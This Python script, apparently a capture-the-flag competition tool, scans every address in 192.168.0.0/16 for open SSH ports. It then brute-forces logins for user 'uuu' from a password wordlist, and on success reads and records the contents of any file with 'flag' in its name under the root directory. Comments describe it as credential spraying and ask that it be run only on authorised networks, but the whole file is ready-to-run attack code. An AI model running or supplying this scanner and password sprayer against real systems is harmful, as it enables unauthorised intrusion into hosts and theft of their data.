import threading
from concurrent.futures import ThreadPoolExecutor
from socket import *

import pexpect
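# Hosts whose port 22 accepted a connection but for which no candidate
# password worked (appended by getPassword, printed by the main loop).
ipList = []
# "<ip> : <password>" -> text captured by getFlag on a successful login.
flag = {}

# Patterns handed to pexpect.expect() after each ssh interaction; the index of
# the match drives the control flow in getPassword:
#   0 pexpect.TIMEOUT  nothing recognisable arrived before the spawn timeout
#   1 "#"              prompt that getPassword treats as a successful login
#   2 "\$"             prompt that getPassword treats as a successful login
#   3 "\?"             a question from ssh; getPassword answers it with "yes"
#                      (presumably the host-key confirmation -- unverified)
#   4 "again"          getPassword treats this as a failed attempt
# These are regexes, so the backslashes must reach pexpect intact. Raw strings
# make that explicit: "\$" / "\?" in a normal string are invalid escape
# sequences (SyntaxWarning on Python 3.12+, a SyntaxError in the future) that
# only happened to keep the backslash.
loginKey = [pexpect.TIMEOUT, "#", r"\$", r"\?", "again"]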
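def getFlag(ip, password, pex):
    """Read the flag file(s) over an already authenticated ssh session.

    Sends one shell one-liner through ``pex`` (an ssh child on which
    getPassword just obtained a prompt) that cats every entry of ``/`` whose
    name contains ``flag``, waits for the next ``loginKey`` match and stores
    whatever arrived before it under ``"<ip> : <password>"`` in the
    module-level ``flag`` dict.

    Args:
        ip: Target host; only used to build the result key.
        password: Password that worked on ``ip``; also only part of the key.
        pex: pexpect child with an interactive shell already open.

    Any error while talking to the child (EOF, broken pipe, ...) stores a
    single space for the key instead of raising, so the scanning thread that
    called us keeps going.
    """
    key = ip + " : " + password
    try:
        # The pattern is deliberately a plain word: the original sent
        # ``grep *flag*`` unquoted, which the remote shell glob-expands against
        # the login directory before grep sees it, and a leading ``*`` is a
        # literal character in a POSIX BRE rather than a wildcard.
        pex.sendline("ls / | grep flag | xargs cat")
        pex.expect(loginKey)
        captured = pex.before
        # pexpect.spawn() without ``encoding=`` yields bytes; str(bytes) would
        # record the repr ("b'...'"), so decode explicitly instead.
        if isinstance(captured, bytes):
            captured = captured.decode("utf-8", errors="replace")
        flag[key] = str(captured)
    except Exception:
        # Best effort, as before: a failed read must not abort the host.
        flag[key] = " "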
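def _attempt_login(pex, candidate):
    """Drive one freshly spawned ssh child through its prompts with ``candidate``.

    Returns True when the reply to the password is a "#" or "$" prompt
    (``loginKey`` index 1 or 2), False for anything else (timeout, "again",
    another question). Raises pexpect.EOF if ssh exits mid-dialogue.
    """
    res = pex.expect(loginKey)
    if res == 3:
        # "?" matched -- presumably the host-key confirmation -- answer it and
        # wait once more. (The original spelled this call ``pex.ecpect``, an
        # AttributeError that a bare except silently turned into "no password
        # found" for every host that asked the question.)
        pex.sendline("yes")
        pex.expect(loginKey)
    # A bare "password:" prompt matches none of loginKey, so the expect above
    # normally ends in TIMEOUT (index 0) after the 1 s spawn timeout; the
    # candidate is sent whatever index came back, exactly as before.
    pex.sendline(candidate)
    res = pex.expect(loginKey)
    return res in (1, 2)


def getPassword(ip):
    """Try every line of the local ``password`` file as the ssh password of ``uuu@ip``.

    For each candidate a fresh ``ssh uuu@<ip>`` child is spawned and driven
    by ``_attempt_login``. On the first candidate that yields a shell prompt,
    getFlag() is run on that session and True is returned. If no candidate
    works, or the wordlist cannot be read, or ssh fails/exits unexpectedly,
    ``ip`` is appended to the module-level ``ipList`` and False is returned.

    Args:
        ip: Target address; used only in ``ssh uuu@<ip>`` and as the ipList
            entry.

    Returns:
        True on a successful login, False otherwise.

    NOTE: this is a credential-spraying loop. Every candidate is a failed
    login in the target's auth log and a separate ssh process; only point it
    at hosts you are explicitly authorised to test.
    """
    try:
        with open("password") as wordlist:
            for line in wordlist:
                candidate = line.strip()
                pex = pexpect.spawn("ssh uuu@" + ip, timeout=1)
                try:
                    if _attempt_login(pex, candidate):
                        getFlag(ip, candidate, pex)
                        return True
                finally:
                    # Reap the ssh child whether or not the attempt worked; the
                    # original spawned one process per candidate and closed none.
                    pex.close(force=True)
    except (OSError, pexpect.ExceptionPexpect):
        # Missing wordlist, spawn failure, ssh exiting early (EOF): treat the
        # host as not cracked, as the original did for any exception, but
        # without swallowing KeyboardInterrupt/SystemExit or real bugs.
        pass
    ipList.append(ip)
    return False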
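def scan(ip):
    """Probe TCP/22 on ``ip`` and, if it accepts a connection, hand the host to getPassword.

    A connect with a 1 s timeout is attempted; refused, filtered or
    unreachable hosts are skipped silently (the expected outcome for nearly
    every address of the sweep). Reachable hosts are printed and then
    password-sprayed by getPassword(), which records the outcome in the
    module-level ``ipList`` / ``flag`` structures.

    Args:
        ip: Dotted-quad address to probe.

    Runs as the body of a worker thread; network errors never propagate.
    """
    try:
        with socket(AF_INET, SOCK_STREAM) as probe:
            probe.settimeout(1)
            probe.connect((ip, 22))
    except OSError:
        # Closed port, filtered, no route, ... (socket.timeout is an OSError
        # subclass). Nothing to do for this host.
        return
    # The probe socket is already closed here, so it is no longer held open
    # for the whole duration of the password spray as in the original.
    print(ip)
    getPassword(ip)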
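if __name__ == "__main__":
    # Sweep 192.168.0.0/16 with host octets 1..254 only (as before), at most
    # 254 probes in flight at once. The pool replaces the two busy-wait loops
    # (``while len(threading.enumerate()) ...: pass``) that pinned a core.
    #
    # NOTE(review): this is a ~64k-host port scan followed by password
    # spraying of every host found. Run it only against networks you own or
    # are explicitly authorised to test.
    targets = (
        "192.168." + str(a) + "." + str(b)
        for a in range(1, 255)
        for b in range(1, 255)
    )
    with ThreadPoolExecutor(max_workers=254) as pool:
        pending = [pool.submit(scan, ip) for ip in targets]
        for fut in pending:
            err = fut.exception()
            if err is not None:
                # A worker that died is reported rather than lost in a future
                # nobody ever looks at.
                print("scan worker failed: " + repr(err))
    print(ipList)
    print(flag)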